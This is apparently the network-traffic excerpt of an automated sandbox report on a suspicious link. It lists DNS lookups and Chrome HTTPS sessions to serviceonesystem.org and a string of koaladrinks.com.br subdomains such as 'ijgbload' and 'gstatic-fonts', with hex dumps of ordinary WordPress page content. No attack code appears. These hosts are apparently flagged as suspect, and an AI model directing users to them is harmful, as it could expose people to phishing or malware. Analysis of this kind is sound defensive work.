                                                      Jan 10, 2025 09:27:50.102492094 CET53565271.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:50.107280970 CET53523221.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:52.027153969 CET5089953192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:52.027375937 CET5211053192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:52.591289997 CET53508991.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:52.591309071 CET53521101.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:55.190143108 CET5701553192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:55.190293074 CET4939653192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:55.299391985 CET53493961.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:55.459352016 CET53570151.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:57.429852962 CET5427753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:57.430183887 CET5138253192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:57.597799063 CET5579653192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:57.597953081 CET6251253192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:57.694194078 CET53513821.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:57.707235098 CET53557961.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:57.743268967 CET53542771.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:57.906060934 CET53625121.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:28:03.270752907 CET53573181.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:28:03.621470928 CET53520521.1.1.1192.168.2.9
                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Jan 10, 2025 09:27:18.907608032 CET192.168.2.91.1.1.1c237(Port unreachable)Destination Unreachable
                                                      Jan 10, 2025 09:27:39.867645979 CET192.168.2.91.1.1.1c231(Port unreachable)Destination Unreachable
                                                      Jan 10, 2025 09:27:57.906152010 CET192.168.2.91.1.1.1c231(Port unreachable)Destination Unreachable
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 10, 2025 09:27:07.938894033 CET192.168.2.91.1.1.10x224dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:07.939173937 CET192.168.2.91.1.1.10x3771Standard query (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:09.495260000 CET192.168.2.91.1.1.10x3623Standard query (0)ctrk.klclick3.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:09.495408058 CET192.168.2.91.1.1.10x6e49Standard query (0)ctrk.klclick3.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:10.147182941 CET192.168.2.91.1.1.10x3c29Standard query (0)cliks.serviceonesystem.orgA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:10.147358894 CET192.168.2.91.1.1.10xc453Standard query (0)cliks.serviceonesystem.org65IN (0x0001)false
                                                      Jan 10, 2025 09:27:12.348932981 CET192.168.2.91.1.1.10xff5eStandard query (0)serviceonesystem.orgA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:12.349131107 CET192.168.2.91.1.1.10x4815Standard query (0)serviceonesystem.org65IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.690385103 CET192.168.2.91.1.1.10xa33fStandard query (0)i.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.690538883 CET192.168.2.91.1.1.10x7097Standard query (0)i.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.789473057 CET192.168.2.91.1.1.10x540aStandard query (0)serviceonesystem.orgA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.789695978 CET192.168.2.91.1.1.10x6f69Standard query (0)serviceonesystem.org65IN (0x0001)false
                                                      Jan 10, 2025 09:27:18.868490934 CET192.168.2.91.1.1.10x1ec0Standard query (0)www.teledataict.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:18.868630886 CET192.168.2.91.1.1.10xf7a6Standard query (0)www.teledataict.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.640460014 CET192.168.2.91.1.1.10xe1c1Standard query (0)google.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.640670061 CET192.168.2.91.1.1.10xa5b3Standard query (0)google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.641794920 CET192.168.2.91.1.1.10xf9c1Standard query (0)www.teledataict.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.642008066 CET192.168.2.91.1.1.10x1d7Standard query (0)www.teledataict.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:20.597481966 CET192.168.2.91.1.1.10x6e31Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:20.597632885 CET192.168.2.91.1.1.10x6e28Standard query (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:21.565428972 CET192.168.2.91.1.1.10xb2d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:21.565615892 CET192.168.2.91.1.1.10x179bStandard query (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:30.675410986 CET192.168.2.91.1.1.10xd39aStandard query (0)ijgbload.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:30.675652981 CET192.168.2.91.1.1.10xe294Standard query (0)ijgbload.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:39.444681883 CET192.168.2.91.1.1.10x5bbdStandard query (0)www3.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:39.444875002 CET192.168.2.91.1.1.10x2c4eStandard query (0)www3.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:40.901681900 CET192.168.2.91.1.1.10x33dStandard query (0)gstatic-fonts.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:40.901911020 CET192.168.2.91.1.1.10xa007Standard query (0)gstatic-fonts.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.005208015 CET192.168.2.91.1.1.10x4622Standard query (0)ijgbload.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.005208015 CET192.168.2.91.1.1.10x8117Standard query (0)ijgbload.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.729995966 CET192.168.2.91.1.1.10xac4cStandard query (0)www3.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.730134010 CET192.168.2.91.1.1.10x18a7Standard query (0)www3.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:49.839915037 CET192.168.2.91.1.1.10x60dfStandard query (0)yt-sub.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:49.840156078 CET192.168.2.91.1.1.10xc0c3Standard query (0)yt-sub.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:52.027153969 CET192.168.2.91.1.1.10xb27cStandard query (0)play.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:52.027375937 CET192.168.2.91.1.1.10xdbacStandard query (0)play.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:55.190143108 CET192.168.2.91.1.1.10x625aStandard query (0)wwws.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:55.190293074 CET192.168.2.91.1.1.10x52ebStandard query (0)wwws.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.429852962 CET192.168.2.91.1.1.10xe7dStandard query (0)wwws.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.430183887 CET192.168.2.91.1.1.10x7047Standard query (0)wwws.koaladrinks.com.br65IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.597799063 CET192.168.2.91.1.1.10x87b4Standard query (0)play.koaladrinks.com.brA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.597953081 CET192.168.2.91.1.1.10xf5eaStandard query (0)play.koaladrinks.com.br65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 10, 2025 09:27:07.945880890 CET1.1.1.1192.168.2.90x224dNo error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:07.946273088 CET1.1.1.1192.168.2.90x3771No error (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:09.502963066 CET1.1.1.1192.168.2.90x3623No error (0)ctrk.klclick3.comcloudflare.klaviyodns.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 09:27:09.510831118 CET1.1.1.1192.168.2.90x6e49No error (0)ctrk.klclick3.comcloudflare.klaviyodns.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 09:27:10.178675890 CET1.1.1.1192.168.2.90x3c29No error (0)cliks.serviceonesystem.org165.22.210.101A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:12.380867004 CET1.1.1.1192.168.2.90xff5eNo error (0)serviceonesystem.org165.22.210.101A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.825143099 CET1.1.1.1192.168.2.90x540aNo error (0)serviceonesystem.org165.22.210.101A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:16.959021091 CET1.1.1.1192.168.2.90xa33fNo error (0)i.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:18.880986929 CET1.1.1.1192.168.2.90x1ec0No error (0)www.teledataict.com172.66.43.95A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:18.880986929 CET1.1.1.1192.168.2.90x1ec0No error (0)www.teledataict.com172.66.40.161A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:18.907530069 CET1.1.1.1192.168.2.90xf7a6No error (0)www.teledataict.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.647208929 CET1.1.1.1192.168.2.90xe1c1No error (0)google.com172.217.23.110A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.647468090 CET1.1.1.1192.168.2.90xa5b3No error (0)google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.655481100 CET1.1.1.1192.168.2.90x1d7No error (0)www.teledataict.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.656419992 CET1.1.1.1192.168.2.90xf9c1No error (0)www.teledataict.com172.66.43.95A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:19.656419992 CET1.1.1.1192.168.2.90xf9c1No error (0)www.teledataict.com172.66.40.161A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:20.604216099 CET1.1.1.1192.168.2.90x6e28No error (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:20.604243040 CET1.1.1.1192.168.2.90x6e31No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:21.572375059 CET1.1.1.1192.168.2.90x179bNo error (0)www.google.com65IN (0x0001)false
                                                      Jan 10, 2025 09:27:21.572784901 CET1.1.1.1192.168.2.90xb2d0No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:30.902877092 CET1.1.1.1192.168.2.90xd39aNo error (0)ijgbload.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:39.798648119 CET1.1.1.1192.168.2.90x5bbdNo error (0)www3.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:41.304016113 CET1.1.1.1192.168.2.90x33dNo error (0)gstatic-fonts.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.306703091 CET1.1.1.1192.168.2.90x4622No error (0)ijgbload.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:43.838659048 CET1.1.1.1192.168.2.90xac4cNo error (0)www3.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:50.102492094 CET1.1.1.1192.168.2.90x60dfNo error (0)yt-sub.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:52.591289997 CET1.1.1.1192.168.2.90xb27cNo error (0)play.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:55.459352016 CET1.1.1.1192.168.2.90x625aNo error (0)wwws.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.707235098 CET1.1.1.1192.168.2.90x87b4No error (0)play.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 09:27:57.743268967 CET1.1.1.1192.168.2.90xe7dNo error (0)wwws.koaladrinks.com.br139.59.30.193A (IP address)IN (0x0001)false
                                                      • cliks.serviceonesystem.org
                                                      • https:
                                                        • serviceonesystem.org
                                                        • i.koaladrinks.com.br
                                                        • www.teledataict.com
                                                        • google.com
                                                        • www.google.com
                                                        • ijgbload.koaladrinks.com.br
                                                        • www3.koaladrinks.com.br
                                                        • gstatic-fonts.koaladrinks.com.br
                                                        • yt-sub.koaladrinks.com.br
                                                        • play.koaladrinks.com.br
                                                        • wwws.koaladrinks.com.br
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.949720165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:11 UTC703OUTGET /?_kx=8HbiTT4litESi4AjCoiaOA.V3Xdb4 HTTP/1.1
                                                      Host: cliks.serviceonesystem.org
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:12 UTC271INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Link: <https://serviceonesystem.org/index.php/wp-json/>; rel="https://api.w.org/"
                                                      Vary: Accept-Encoding
                                                      2025-01-10 08:27:12 UTC16113INData Raw: 63 35 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d
                                                      Data Ascii: c52c<!DOCTYPE html><html lang="en-GB"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><style>img:is([sizes="auto" i], [sizes^="auto," i]
                                                      2025-01-10 08:27:12 UTC16384INData Raw: 37 34 66 63 29 7d 2e 68 61 73 2d 72 65 67 75 6c 61 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 36 32 35 65 6d 7d 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 29 7d 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74
                                                      Data Ascii: 74fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:cent
                                                      2025-01-10 08:27:12 UTC16384INData Raw: 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e
                                                      Data Ascii: dient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.
                                                      2025-01-10 08:27:12 UTC1608INData Raw: 3e 0a 09 09 0a 09 3c 2f 64 69 76 3e 0a 09 0a 3c 2f 64 69 76 3e 0a 0a 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 73 6b 69 70 2d 6c 69 6e 6b 2d 6a 73 2d 61 66 74 65 72 22 3e 0a 09 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 76 61 72 20 73 6b 69 70 4c 69 6e 6b 54 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 20 27 6d 61 69 6e 27 20 29 2c 0a 09 09 09 73 69 62 6c 69 6e 67 2c 0a 09 09 09 73 6b 69 70 4c 69 6e 6b 54 61 72 67 65 74 49 44 2c 0a 09 09 09 73 6b 69 70 4c 69 6e 6b 3b 0a 0a 09 09 2f 2f 20 45 61 72 6c 79 20 65 78 69 74 20 69 66 20 61 20 73 6b 69 70 2d 6c 69 6e 6b 20 74 61 72 67 65 74 20 63 61 6e 27 74
                                                      Data Ascii: ></div></div></footer></div><script id="wp-block-template-skip-link-js-after">( function() {var skipLinkTarget = document.querySelector( 'main' ),sibling,skipLinkTargetID,skipLink;// Early exit if a skip-link target can't


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.949721165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:13 UTC596OUTGET /wp-includes/blocks/navigation/style.min.css?ver=6.7.1 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://cliks.serviceonesystem.org/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:14 UTC235INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:13 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 16384
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:20 GMT
                                                      Connection: close
                                                      ETag: "677b7a98-4000"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:14 UTC16149INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 73 65 74 74 69 6e 67 3a 66 6c 65 78 2d 73 74 61 72 74 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 77 72 61 70 3a 77 72 61 70 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 6a 75 73 74 69 66 79 3a 66 6c 65 78 2d 73 74 61 72 74 3b 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 75 6c 7b 6d 61 72
                                                      Data Ascii: .wp-block-navigation{position:relative;--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center}.wp-block-navigation ul{mar
                                                      2025-01-10 08:27:14 UTC235INData Raw: 6e 2d 62 61 72 20 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 64 69 61 6c 6f 67 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 36 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 68 61 73 2d 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 61 64 6d 69 6e 2d 62 61 72 20 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 64 69 61 6c 6f 67 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 32 70 78 7d 7d 68 74 6d 6c 2e 68 61 73 2d 6d 6f 64 61 6c 2d 6f 70 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d
                                                      Data Ascii: n-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.949724165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:14 UTC666OUTGET /wp-includes/js/dist/script-modules/block-library/navigation/view.min.js?ver=8ff192874fc8910a284c HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://cliks.serviceonesystem.org
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://cliks.serviceonesystem.org/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:14 UTC262INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:14 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 3300
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:20 GMT
                                                      Connection: close
                                                      ETag: "677b7a98-ce4"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:14 UTC3300INData Raw: 69 6d 70 6f 72 74 2a 61 73 20 65 20 66 72 6f 6d 22 40 77 6f 72 64 70 72 65 73 73 2f 69 6e 74 65 72 61 63 74 69 76 69 74 79 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 6f 29 26 26 21 74 2e 6f 28 65 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 3b 63 6f 6e 73 74 20 6e 3d 28 65 3d 3e 7b 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 6e 2c 65 29 2c 6e 7d 29 28 7b 67 65 74 43 6f 6e 74 65 78 74 3a
                                                      Data Ascii: import*as e from"@wordpress/interactivity";var t={d:(e,n)=>{for(var o in n)t.o(n,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const n=(e=>{var n={};return t.d(n,e),n})({getContext:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.949722165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:14 UTC595OUTGET /wp-content/themes/twentytwentyfive/style.css?ver=1.0 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://cliks.serviceonesystem.org/
